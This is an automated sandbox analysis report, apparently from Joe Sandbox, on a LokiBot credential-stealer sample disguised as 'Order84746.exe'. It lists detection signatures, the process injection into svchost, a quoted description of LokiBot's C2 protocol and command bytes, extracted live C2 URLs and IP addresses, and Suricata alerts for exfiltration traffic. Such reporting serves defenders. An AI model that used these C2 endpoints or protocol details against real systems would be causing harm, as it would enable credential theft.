Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order84746.exe

Overview

General Information

Sample name:Order84746.exe
Analysis ID:1565036
MD5:6e891f3adbfd415fae70ff8376014769
SHA1:9dd2239eba106fe8b3b97992064d07c532a0c9ee
SHA256:a2504b173353b434fe409705dbc066fb36c9a74d45a36d89ee421a1da3b4461b
Tags:exeLokiuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Order84746.exe (PID: 280 cmdline: "C:\Users\user\Desktop\Order84746.exe" MD5: 6E891F3ADBFD415FAE70FF8376014769)
    • svchost.exe (PID: 3300 cmdline: "C:\Users\user\Desktop\Order84746.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u009b\u009e\u0089\u0096\u0091\u009c\u0096\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2659257287.0000000003621000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Order84746.exe.38a0000.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.Order84746.exe.38a0000.1.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              0.2.Order84746.exe.38a0000.1.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              0.2.Order84746.exe.38a0000.1.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              0.2.Order84746.exe.38a0000.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 24 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Order84746.exe", CommandLine: "C:\Users\user\Desktop\Order84746.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order84746.exe", ParentImage: C:\Users\user\Desktop\Order84746.exe, ParentProcessId: 280, ParentProcessName: Order84746.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order84746.exe", ProcessId: 3300, ProcessName: svchost.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Order84746.exe", CommandLine: "C:\Users\user\Desktop\Order84746.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order84746.exe", ParentImage: C:\Users\user\Desktop\Order84746.exe, ParentProcessId: 280, ParentProcessName: Order84746.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order84746.exe", ProcessId: 3300, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:01.743805+010020243121A Network Trojan was detected192.168.2.44973094.156.177.4180TCP
              2024-11-29T07:37:03.474759+010020243121A Network Trojan was detected192.168.2.44973194.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:00.208189+010020253811Malware Command and Control Activity Detected192.168.2.44973094.156.177.4180TCP
              2024-11-29T07:37:02.129463+010020253811Malware Command and Control Activity Detected192.168.2.44973194.156.177.4180TCP
              2024-11-29T07:37:03.780451+010020253811Malware Command and Control Activity Detected192.168.2.44973294.156.177.4180TCP
              2024-11-29T07:37:05.683692+010020253811Malware Command and Control Activity Detected192.168.2.44973394.156.177.4180TCP
              2024-11-29T07:37:07.798758+010020253811Malware Command and Control Activity Detected192.168.2.44973494.156.177.4180TCP
              2024-11-29T07:37:11.363666+010020253811Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
              2024-11-29T07:37:13.268211+010020253811Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
              2024-11-29T07:37:15.019342+010020253811Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
              2024-11-29T07:37:16.845716+010020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
              2024-11-29T07:37:21.749992+010020253811Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
              2024-11-29T07:37:23.468794+010020253811Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
              2024-11-29T07:37:25.297011+010020253811Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
              2024-11-29T07:37:30.107976+010020253811Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
              2024-11-29T07:37:32.298014+010020253811Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
              2024-11-29T07:37:34.000360+010020253811Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
              2024-11-29T07:37:35.905770+010020253811Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
              2024-11-29T07:37:37.671798+010020253811Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
              2024-11-29T07:37:39.516381+010020253811Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
              2024-11-29T07:37:41.298199+010020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
              2024-11-29T07:37:43.127928+010020253811Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
              2024-11-29T07:37:44.826715+010020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
              2024-11-29T07:37:46.499557+010020253811Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
              2024-11-29T07:37:48.348566+010020253811Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
              2024-11-29T07:37:50.256361+010020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
              2024-11-29T07:37:55.174548+010020253811Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
              2024-11-29T07:37:56.938795+010020253811Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
              2024-11-29T07:37:58.812353+010020253811Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
              2024-11-29T07:38:01.082225+010020253811Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
              2024-11-29T07:38:02.758235+010020253811Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
              2024-11-29T07:38:04.577451+010020253811Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
              2024-11-29T07:38:06.307814+010020253811Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
              2024-11-29T07:38:08.178167+010020253811Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
              2024-11-29T07:38:13.081566+010020253811Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
              2024-11-29T07:38:14.764601+010020253811Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:05.193223+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449732TCP
              2024-11-29T07:37:07.486946+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449733TCP
              2024-11-29T07:37:11.095624+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449734TCP
              2024-11-29T07:37:13.005901+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449735TCP
              2024-11-29T07:37:14.759712+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449736TCP
              2024-11-29T07:37:16.574591+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449738TCP
              2024-11-29T07:37:21.486611+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449740TCP
              2024-11-29T07:37:23.197276+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449744TCP
              2024-11-29T07:37:25.027569+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449746TCP
              2024-11-29T07:37:29.844766+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449747TCP
              2024-11-29T07:37:32.037107+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449748TCP
              2024-11-29T07:37:33.740688+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449749TCP
              2024-11-29T07:37:35.642714+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449750TCP
              2024-11-29T07:37:37.404244+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449751TCP
              2024-11-29T07:37:39.256251+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449752TCP
              2024-11-29T07:37:41.033957+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449753TCP
              2024-11-29T07:37:42.786866+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449754TCP
              2024-11-29T07:37:44.558497+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449755TCP
              2024-11-29T07:37:46.232846+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449756TCP
              2024-11-29T07:37:48.083520+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449757TCP
              2024-11-29T07:37:49.955918+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449758TCP
              2024-11-29T07:37:54.898521+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449759TCP
              2024-11-29T07:37:56.670018+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449760TCP
              2024-11-29T07:37:58.539743+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449763TCP
              2024-11-29T07:38:00.821049+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449764TCP
              2024-11-29T07:38:02.487383+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449770TCP
              2024-11-29T07:38:04.320327+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449776TCP
              2024-11-29T07:38:06.029060+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449782TCP
              2024-11-29T07:38:07.905771+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449788TCP
              2024-11-29T07:38:12.821427+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449789TCP
              2024-11-29T07:38:14.498649+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449805TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:05.072766+010020243131Malware Command and Control Activity Detected192.168.2.44973294.156.177.4180TCP
              2024-11-29T07:37:07.366794+010020243131Malware Command and Control Activity Detected192.168.2.44973394.156.177.4180TCP
              2024-11-29T07:37:10.975348+010020243131Malware Command and Control Activity Detected192.168.2.44973494.156.177.4180TCP
              2024-11-29T07:37:12.885873+010020243131Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
              2024-11-29T07:37:14.639768+010020243131Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
              2024-11-29T07:37:16.454677+010020243131Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
              2024-11-29T07:37:21.366370+010020243131Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
              2024-11-29T07:37:23.076999+010020243131Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
              2024-11-29T07:37:24.907443+010020243131Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
              2024-11-29T07:37:29.724840+010020243131Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
              2024-11-29T07:37:31.916984+010020243131Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
              2024-11-29T07:37:33.620651+010020243131Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
              2024-11-29T07:37:35.522594+010020243131Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
              2024-11-29T07:37:37.284247+010020243131Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
              2024-11-29T07:37:39.136283+010020243131Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
              2024-11-29T07:37:40.913875+010020243131Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
              2024-11-29T07:37:42.666274+010020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
              2024-11-29T07:37:44.438287+010020243131Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
              2024-11-29T07:37:46.112958+010020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
              2024-11-29T07:37:47.963472+010020243131Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
              2024-11-29T07:37:49.835944+010020243131Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
              2024-11-29T07:37:54.778517+010020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
              2024-11-29T07:37:56.550153+010020243131Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
              2024-11-29T07:37:58.419693+010020243131Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
              2024-11-29T07:38:00.701009+010020243131Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
              2024-11-29T07:38:02.367408+010020243131Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
              2024-11-29T07:38:04.200296+010020243131Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
              2024-11-29T07:38:05.909208+010020243131Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
              2024-11-29T07:38:07.785106+010020243131Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
              2024-11-29T07:38:12.701337+010020243131Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
              2024-11-29T07:38:14.378688+010020243131Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
              2024-11-29T07:38:36.587730+010020243131Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:05.072766+010020243181Malware Command and Control Activity Detected192.168.2.44973294.156.177.4180TCP
              2024-11-29T07:37:07.366794+010020243181Malware Command and Control Activity Detected192.168.2.44973394.156.177.4180TCP
              2024-11-29T07:37:10.975348+010020243181Malware Command and Control Activity Detected192.168.2.44973494.156.177.4180TCP
              2024-11-29T07:37:12.885873+010020243181Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
              2024-11-29T07:37:14.639768+010020243181Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
              2024-11-29T07:37:16.454677+010020243181Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
              2024-11-29T07:37:21.366370+010020243181Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
              2024-11-29T07:37:23.076999+010020243181Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
              2024-11-29T07:37:24.907443+010020243181Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
              2024-11-29T07:37:29.724840+010020243181Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
              2024-11-29T07:37:31.916984+010020243181Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
              2024-11-29T07:37:33.620651+010020243181Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
              2024-11-29T07:37:35.522594+010020243181Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
              2024-11-29T07:37:37.284247+010020243181Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
              2024-11-29T07:37:39.136283+010020243181Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
              2024-11-29T07:37:40.913875+010020243181Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
              2024-11-29T07:37:42.666274+010020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
              2024-11-29T07:37:44.438287+010020243181Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
              2024-11-29T07:37:46.112958+010020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
              2024-11-29T07:37:47.963472+010020243181Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
              2024-11-29T07:37:49.835944+010020243181Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
              2024-11-29T07:37:54.778517+010020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
              2024-11-29T07:37:56.550153+010020243181Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
              2024-11-29T07:37:58.419693+010020243181Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
              2024-11-29T07:38:00.701009+010020243181Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
              2024-11-29T07:38:02.367408+010020243181Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
              2024-11-29T07:38:04.200296+010020243181Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
              2024-11-29T07:38:05.909208+010020243181Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
              2024-11-29T07:38:07.785106+010020243181Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
              2024-11-29T07:38:12.701337+010020243181Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
              2024-11-29T07:38:14.378688+010020243181Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
              2024-11-29T07:38:36.587730+010020243181Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:00.208189+010020216411A Network Trojan was detected192.168.2.44973094.156.177.4180TCP
              2024-11-29T07:37:02.129463+010020216411A Network Trojan was detected192.168.2.44973194.156.177.4180TCP
              2024-11-29T07:37:03.780451+010020216411A Network Trojan was detected192.168.2.44973294.156.177.4180TCP
              2024-11-29T07:37:05.683692+010020216411A Network Trojan was detected192.168.2.44973394.156.177.4180TCP
              2024-11-29T07:37:07.798758+010020216411A Network Trojan was detected192.168.2.44973494.156.177.4180TCP
              2024-11-29T07:37:11.363666+010020216411A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
              2024-11-29T07:37:13.268211+010020216411A Network Trojan was detected192.168.2.44973694.156.177.4180TCP
              2024-11-29T07:37:15.019342+010020216411A Network Trojan was detected192.168.2.44973894.156.177.4180TCP
              2024-11-29T07:37:16.845716+010020216411A Network Trojan was detected192.168.2.44974094.156.177.4180TCP
              2024-11-29T07:37:21.749992+010020216411A Network Trojan was detected192.168.2.44974494.156.177.4180TCP
              2024-11-29T07:37:23.468794+010020216411A Network Trojan was detected192.168.2.44974694.156.177.4180TCP
              2024-11-29T07:37:25.297011+010020216411A Network Trojan was detected192.168.2.44974794.156.177.4180TCP
              2024-11-29T07:37:30.107976+010020216411A Network Trojan was detected192.168.2.44974894.156.177.4180TCP
              2024-11-29T07:37:32.298014+010020216411A Network Trojan was detected192.168.2.44974994.156.177.4180TCP
              2024-11-29T07:37:34.000360+010020216411A Network Trojan was detected192.168.2.44975094.156.177.4180TCP
              2024-11-29T07:37:35.905770+010020216411A Network Trojan was detected192.168.2.44975194.156.177.4180TCP
              2024-11-29T07:37:37.671798+010020216411A Network Trojan was detected192.168.2.44975294.156.177.4180TCP
              2024-11-29T07:37:39.516381+010020216411A Network Trojan was detected192.168.2.44975394.156.177.4180TCP
              2024-11-29T07:37:41.298199+010020216411A Network Trojan was detected192.168.2.44975494.156.177.4180TCP
              2024-11-29T07:37:43.127928+010020216411A Network Trojan was detected192.168.2.44975594.156.177.4180TCP
              2024-11-29T07:37:44.826715+010020216411A Network Trojan was detected192.168.2.44975694.156.177.4180TCP
              2024-11-29T07:37:46.499557+010020216411A Network Trojan was detected192.168.2.44975794.156.177.4180TCP
              2024-11-29T07:37:48.348566+010020216411A Network Trojan was detected192.168.2.44975894.156.177.4180TCP
              2024-11-29T07:37:50.256361+010020216411A Network Trojan was detected192.168.2.44975994.156.177.4180TCP
              2024-11-29T07:37:55.174548+010020216411A Network Trojan was detected192.168.2.44976094.156.177.4180TCP
              2024-11-29T07:37:56.938795+010020216411A Network Trojan was detected192.168.2.44976394.156.177.4180TCP
              2024-11-29T07:37:58.812353+010020216411A Network Trojan was detected192.168.2.44976494.156.177.4180TCP
              2024-11-29T07:38:01.082225+010020216411A Network Trojan was detected192.168.2.44977094.156.177.4180TCP
              2024-11-29T07:38:02.758235+010020216411A Network Trojan was detected192.168.2.44977694.156.177.4180TCP
              2024-11-29T07:38:04.577451+010020216411A Network Trojan was detected192.168.2.44978294.156.177.4180TCP
              2024-11-29T07:38:06.307814+010020216411A Network Trojan was detected192.168.2.44978894.156.177.4180TCP
              2024-11-29T07:38:08.178167+010020216411A Network Trojan was detected192.168.2.44978994.156.177.4180TCP
              2024-11-29T07:38:13.081566+010020216411A Network Trojan was detected192.168.2.44980594.156.177.4180TCP
              2024-11-29T07:38:14.764601+010020216411A Network Trojan was detected192.168.2.44980694.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T07:37:00.208189+010028257661Malware Command and Control Activity Detected192.168.2.44973094.156.177.4180TCP
              2024-11-29T07:37:02.129463+010028257661Malware Command and Control Activity Detected192.168.2.44973194.156.177.4180TCP
              2024-11-29T07:37:03.780451+010028257661Malware Command and Control Activity Detected192.168.2.44973294.156.177.4180TCP
              2024-11-29T07:37:05.683692+010028257661Malware Command and Control Activity Detected192.168.2.44973394.156.177.4180TCP
              2024-11-29T07:37:07.798758+010028257661Malware Command and Control Activity Detected192.168.2.44973494.156.177.4180TCP
              2024-11-29T07:37:11.363666+010028257661Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
              2024-11-29T07:37:13.268211+010028257661Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
              2024-11-29T07:37:15.019342+010028257661Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
